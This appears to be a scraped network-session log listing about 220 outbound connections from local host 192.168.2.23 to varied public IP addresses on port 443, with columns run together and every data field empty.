                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10828192.168.2.2348800209.207.76.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10829192.168.2.2336460210.19.61.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10830192.168.2.2348580177.134.112.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10831192.168.2.234944287.21.98.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10832192.168.2.2339808167.72.2.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10833192.168.2.2352934213.59.245.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10834192.168.2.2335454152.74.235.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10835192.168.2.235255017.72.92.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10836192.168.2.2352798143.43.164.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10837192.168.2.234058859.9.48.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10838192.168.2.235751436.29.79.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10839192.168.2.235162479.46.144.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10840192.168.2.234257852.86.92.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10841192.168.2.2342332186.146.202.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10842192.168.2.233381877.244.168.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10843192.168.2.2347594184.49.42.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10844192.168.2.233338465.210.162.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10845192.168.2.2353932219.148.220.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10846192.168.2.2338858219.97.74.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10847192.168.2.233697067.144.50.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10848192.168.2.2358632159.136.26.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10849192.168.2.2360568118.124.34.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10850192.168.2.2339694217.36.210.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10851192.168.2.235489470.50.164.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10852192.168.2.2352754105.58.241.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10853192.168.2.2353490150.65.238.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10854192.168.2.233767639.80.45.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10855192.168.2.233900073.52.103.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10856192.168.2.235235070.109.128.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10857192.168.2.2341262213.143.26.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10858192.168.2.2337234207.211.144.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10859192.168.2.2347654111.153.222.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10860192.168.2.2336834119.97.236.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10861192.168.2.2336644197.229.183.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10862192.168.2.233883866.108.161.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10863192.168.2.234435297.114.172.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10864192.168.2.234511097.76.193.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10865192.168.2.235262091.78.23.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10866192.168.2.2356302126.7.9.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10867192.168.2.2354548135.176.106.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10868192.168.2.23406442.193.230.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10869192.168.2.23431169.62.51.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10870192.168.2.2353354155.46.182.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10871192.168.2.2354974207.127.77.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10872192.168.2.2359134103.50.157.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10873192.168.2.2350886213.149.124.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10874192.168.2.233439812.173.104.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10875192.168.2.233338095.196.216.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10876192.168.2.2344622149.56.195.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10877192.168.2.2343998213.8.13.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10878192.168.2.2360242201.135.143.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10879192.168.2.235035044.133.69.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10880192.168.2.235776686.156.177.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10881192.168.2.2349788190.249.254.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10882192.168.2.236055453.45.102.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10883192.168.2.2345358182.49.202.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10884192.168.2.233411075.63.79.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10885192.168.2.2345586178.243.205.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10886192.168.2.2345758209.63.110.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10887192.168.2.2358736128.123.226.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10888192.168.2.233749437.235.163.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10889192.168.2.2358280143.67.205.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10890192.168.2.2343236171.187.98.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10891192.168.2.235505448.213.178.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10892192.168.2.235524054.107.141.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10893192.168.2.2357240138.249.214.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10894192.168.2.2357166201.138.218.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10895192.168.2.2349670137.215.120.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10896192.168.2.234396425.83.176.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10897192.168.2.235367013.157.223.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10898192.168.2.2360364201.198.164.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10899192.168.2.2358586183.22.254.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10900192.168.2.2358932216.201.251.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10901192.168.2.235582488.91.40.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10902192.168.2.2358222212.138.75.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10903192.168.2.2355392115.28.235.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10904192.168.2.2349438199.38.153.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10905192.168.2.2335914128.203.111.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10906192.168.2.2343888220.93.65.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10907192.168.2.2343562109.244.146.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10908192.168.2.2351972100.151.250.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10909192.168.2.2350246208.44.198.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10910192.168.2.2337986101.220.41.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10911192.168.2.2352724117.121.214.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10912192.168.2.2359288155.156.184.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10913192.168.2.2347642210.66.148.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10914192.168.2.2354080131.104.232.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10915192.168.2.23482941.151.5.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10916192.168.2.235355646.14.42.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10917192.168.2.234131888.80.204.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10918192.168.2.2341510209.191.37.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10919192.168.2.2340030201.107.148.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10920192.168.2.2345832157.35.85.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10921192.168.2.233302253.73.84.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10922192.168.2.2337356178.135.161.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10923192.168.2.2342880167.205.120.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10924192.168.2.2344436177.60.117.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10925192.168.2.235588896.249.159.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10926192.168.2.2354586117.185.150.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10927192.168.2.2360474172.79.207.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10928192.168.2.2333424187.142.184.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10929192.168.2.2353152152.172.230.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10930192.168.2.2340408119.226.0.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10931192.168.2.23546249.247.167.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10932192.168.2.2351250179.251.244.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10933192.168.2.233989024.141.162.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10934192.168.2.2333188157.228.211.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10935192.168.2.2343898208.101.32.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10936192.168.2.233326658.15.195.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10937192.168.2.2340074170.195.90.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10938192.168.2.235103240.2.95.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10939192.168.2.2356084151.116.246.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10940192.168.2.2346378110.197.236.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10941192.168.2.235886881.189.120.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10942192.168.2.235853461.23.123.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10943192.168.2.2352152164.56.85.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10944192.168.2.235350861.216.1.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10945192.168.2.2343204153.82.136.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10946192.168.2.2349936209.27.234.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10947192.168.2.2355154123.229.96.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10948192.168.2.234466472.119.41.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10949192.168.2.234352077.26.192.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10950192.168.2.2353236101.105.7.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10951192.168.2.235338639.103.223.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10952192.168.2.2350642156.201.92.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10953192.168.2.2350476129.221.238.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10954192.168.2.234209277.2.227.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10955192.168.2.2333724146.168.52.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10956192.168.2.2349364131.2.142.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10957192.168.2.2333972203.206.170.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10958192.168.2.235685427.188.252.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10959192.168.2.2360996181.147.185.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10960192.168.2.2334760205.168.40.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10961192.168.2.2338342126.180.211.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10962192.168.2.235760887.179.231.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10963192.168.2.23574009.48.47.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10964192.168.2.2351872163.106.194.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10965192.168.2.2352982105.44.124.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10966192.168.2.233384072.36.240.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10967192.168.2.2350752175.237.143.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10968192.168.2.2359972106.79.77.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10969192.168.2.233873650.5.110.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10970192.168.2.2350876122.85.10.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10971192.168.2.23485722.249.137.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10972192.168.2.2355910170.43.193.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10973192.168.2.2333324149.147.151.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10974192.168.2.233690479.152.100.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10975192.168.2.235032838.127.45.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10976192.168.2.2333954181.185.155.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10977192.168.2.235518245.57.184.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10978192.168.2.2336164213.28.206.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10979192.168.2.2339014166.248.3.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10980192.168.2.235818269.127.59.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10981192.168.2.2341358217.147.87.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10982192.168.2.235841289.6.108.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10983192.168.2.23567545.62.79.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10984192.168.2.236067845.109.45.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10985192.168.2.235666417.250.154.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10986192.168.2.2340706221.173.12.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10987192.168.2.23484342.158.95.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10988192.168.2.233531225.161.121.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10989192.168.2.2336356203.229.28.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10990192.168.2.2345788212.96.153.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10991192.168.2.233455034.29.172.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10992192.168.2.2340986178.39.184.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10993192.168.2.233824670.96.228.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10994192.168.2.2339440109.200.221.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10995192.168.2.2348246140.51.3.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10996192.168.2.2342604126.197.215.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10997192.168.2.2339388209.93.1.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10998192.168.2.2359626180.26.139.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10999192.168.2.233960077.83.4.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11000192.168.2.235624638.168.73.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11001192.168.2.2354980209.198.91.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11002192.168.2.233561617.17.28.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11003192.168.2.235615486.113.204.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11004192.168.2.234776682.52.113.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11005192.168.2.2343560105.10.248.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11006192.168.2.2354016106.83.198.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11007192.168.2.2360532145.247.106.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11008192.168.2.2350474137.72.106.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11009192.168.2.2343998124.155.164.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11010192.168.2.235663423.220.175.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11011192.168.2.2343530194.155.175.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11012192.168.2.2340864217.190.215.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11013192.168.2.235686073.55.2.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11014192.168.2.2344978106.96.217.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11015192.168.2.235068659.181.61.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11016192.168.2.2342742213.245.173.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11017192.168.2.2343336114.191.32.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11018192.168.2.2353530216.183.78.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11019192.168.2.2345052153.90.216.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11020192.168.2.2355452222.160.186.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11021192.168.2.233556877.220.194.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11022192.168.2.2344042172.142.140.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11023192.168.2.2346374122.174.156.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11024192.168.2.2344710188.208.123.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11025192.168.2.2360072220.176.25.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11026192.168.2.2356878163.125.238.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11027192.168.2.234745663.244.24.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11028192.168.2.234144868.220.65.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11029192.168.2.2347786218.37.251.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11030192.168.2.2360786184.203.197.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11031192.168.2.233974241.114.236.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11032192.168.2.235771645.189.158.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11033192.168.2.2360154216.77.251.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11034192.168.2.2341584218.171.176.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11035192.168.2.235473484.91.224.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11036192.168.2.233870291.21.190.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11037192.168.2.2354258223.221.133.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11038192.168.2.2336746212.204.89.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11039192.168.2.234210686.151.22.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11040192.168.2.2334798216.152.124.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11041192.168.2.2342762151.235.99.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11042192.168.2.2354810139.225.177.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11043192.168.2.2339860198.103.164.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11044192.168.2.2338960158.152.134.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11045192.168.2.236033888.37.223.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11046192.168.2.2352896188.249.165.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11047192.168.2.235970839.137.6.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11048192.168.2.234376059.184.207.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11049192.168.2.2357502142.153.241.183443
